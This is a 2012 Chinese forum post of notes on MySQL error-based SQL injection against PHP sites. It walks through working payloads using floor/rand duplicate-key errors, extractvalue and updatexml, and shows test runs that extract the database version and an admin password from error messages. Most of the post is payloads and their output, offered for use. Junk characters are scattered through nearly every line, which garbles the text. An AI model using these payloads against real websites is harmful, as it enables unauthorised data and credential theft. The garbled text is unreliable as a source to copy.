放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
1 n4 M9 j, M i2 I( Z. p* q0 y& I实际测试环境:
' C" {6 P3 q/ P5 ?3 h& o9 Y) R* R# H0 ]2 J% A
2 J \( r6 z) a/ Z( ] R5 a! N2 J9 ?mysql> show tables;
! y% ]1 b- X7 T2 N4 d+----------------+
) _7 }( Q: Z' l& Z8 K; V1 \| Tables_in_test |
) x8 J; _! B" ^) d0 _( g6 n9 I+----------------+
$ j6 k2 X' w: O) M4 w+ I" }| admin |8 k6 w0 B, b! z! o
| article |
! U2 F, Y/ |. S1 H+----------------+' ?( g2 n8 [4 F
/ u+ o/ W0 n2 @; f+ I6 N
" q2 X8 I4 c9 R$ m
3 r$ Z% n( K% y2 A3 @
mysql> describe admin;+ d5 w8 T4 d% o9 c4 e) k5 I
+-------+------------------+------+-----+---------+----------------+
, `$ t% z6 ~2 I- ~| Field | Type | Null | Key | Default | Extra |
) O! e& \/ o2 [$ u+-------+------------------+------+-----+---------+----------------+
' f+ r, f" x `- Z( D/ Y5 l! E' V| id | int(10) unsigned | NO | PRI | NULL | auto_increment |4 K, Z; T3 g4 f2 u( q
| user | varchar(50) | NO | | NULL | |
" n# s8 L' B! D| pass | varchar(50) | NO | | NULL | |
% V6 [9 N+ Z& Y+-------+------------------+------+-----+---------+----------------+
" F/ L# |# ]2 X 9 o. T! ?' h+ y3 T \4 g
# d% x$ k$ J& [) m1 s7 L
- \: V. P$ M" Z% K# I2 |: xmysql> describe article;
4 D( Y9 A0 q7 T7 |' ^% R2 B+---------+------------------+------+-----+---------+----------------+9 j* F( Q, b6 c) C6 Q$ m" B8 Z
| Field | Type | Null | Key | Default | Extra |2 f& O4 g- l6 p7 [7 _- }6 b( d4 G" B3 e
+---------+------------------+------+-----+---------+----------------+' j, v8 K7 T. ]1 Z# L) v8 L
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
; B7 V9 h- @* f5 \* L| title | varchar(50) | NO | | NULL | |" C7 A4 i" C$ Q+ f
| content | varchar(50) | NO | | NULL | |
1 R0 m% J) v, n5 h. f+---------+------------------+------+-----+---------+----------------+ p" c9 |! ]+ K) E0 H; v8 z" K
1、通过floor报错
- N. _- {7 a% O, v8 v7 s! ?可以通过如下一些利用代码
5 c$ W" p2 v3 A' k r8 e3 N6 V6 _. H! Q
% N+ n6 [$ Q" w6 A0 Vand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x$ p; k( m, m! D0 u0 D; ~1 n
from information_schema.tables group by x)a);
6 M; h+ [3 e( y . ?$ ~+ t- M2 g: @+ m! ]
5 [! ?$ j- U. L$ X" J
and (select count(*) from (select 1 union select null union select !1)x7 E! b1 L" z/ F
group by concat((select table_name from information_schema.tables limit 1),
' V3 {/ l" R7 R4 j# [floor(rand(0)*2)));
9 j0 p5 B7 j" h9 N$ g举例如下:5 D* e, @4 {- Q. _
首先进行正常查询:# Y1 Q3 |: \2 X: J- E' R) X& w# ~! O
0 U- U+ {: U8 d' `5 R# `( d$ `; U+ @mysql> select * from article where id = 1;
% Q3 U7 D' [4 S0 \# r- j6 m+----+-------+---------+$ E" B& I: N' @: ], V7 ^* u& P- U
| id | title | content |( m& p! f- z( f# b! U6 y3 f7 |& x) M
+----+-------+---------+) [; p- t* ^7 c1 o3 v1 `
| 1 | test | do it |
- N7 Y& C5 q3 f, S, t9 I) c+----+-------+---------+# v1 f6 v& ~! q- N1 @
假如id输入存在注入的话,可以通过如下语句进行报错。. y: S: J8 o( C, K) j7 G/ N: X( c& `
- V# Z. B1 y. ]: Q4 T, A6 k
# ?# y5 e/ z- `% Rmysql> select * from article where id = 1 and (select 1 from6 E" ^- R4 ]( j/ P3 b0 a
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);- ?; p% ^, E* d3 m& B; Q
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key': o: {( K; d) _/ d! S
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。$ ` z; ^3 }- }& }0 k/ n4 K4 r4 _
例如我们需要查询管理员用户名和密码:
) n8 Z) J7 S) ?6 XMethod1:
# Y( ~: s+ |- i! [; s 1 Z! ]7 \+ I! S4 ~) ]. x% l
$ W% L0 F/ `) i: r" Qmysql> select * from article where id = 1 and (select 1 from3 ~ O8 a4 [3 Y0 y* r
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
7 c3 J! c4 z3 Vfrom information_schema.tables group by x)a);
, g# r2 V4 X# t: B' {' t0 ^ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'3 E* d/ ~) o+ z* \/ q
Method2:
+ K% Q4 ^) L2 N/ ?2 G 5 K4 E u% H0 ]6 A- b( @
- n) m a, U. P
mysql> select * from article where id = 1 and (select count(*)+ o4 A: o! H+ Y: i* X
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
/ V6 }/ N+ t0 @0 d* w. s9 \floor(rand(0)*2)));
# j& |* b7 B" x! M: O8 a& J* Y- GERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
# |: `: {/ ]$ V' M( u! C0 w2、ExtractValue" p4 v6 @/ L3 C: u3 q6 _
测试语句如下
8 z* ~+ y8 Y, p' }
Y0 K! V/ c, a( R( p / x6 P8 m% K4 W( O' N
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));/ V# H q" v5 G# U: q" e# z
实际测试过程/ K3 D6 L8 K4 l' z0 G: P8 o3 {8 Y5 M: d' Z
0 c6 e9 q F q7 ?' i$ T# n
# C. Q6 f. Z' p
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
9 k7 |5 V0 w# y8 N# b(select pass from admin limit 1)));--# q+ o% ?) q5 V
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
0 Y% M6 E$ @$ @, d- C; h4 a3、UpdateXml
. D: Q; `8 y" N+ a测试语句
/ a8 V2 u0 I: l7 \9 v 9 p I* [9 _; |* Z. z* m+ O3 E
0 Q7 A/ L* [8 G3 |5 {* h, j+ cand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))9 O2 ?8 Z" L9 D, P- G+ P* m( b
实际测试过程2 X3 s; M' T( o9 D/ k4 d8 N
$ ?0 `3 v3 L* B5 r6 n
& L, E4 C6 `& G6 L4 p: a8 Bmysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,+ r4 E: e% q$ _* R
(select pass from admin limit 1),0x5e24),1));
. z- y5 _, Y/ Z2 o/ c& WERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
7 L/ k* T8 m& w5 A; y& ~All, thanks foreign guys.
' K! ^# ^; W3 D; z0 P
& g: r" l3 t6 [- q0 L$ R2 u. l$ t8 U) ]: k' j3 P' r6 l
|
发表于 2012-12-10 10:28:51
收藏
支持
反对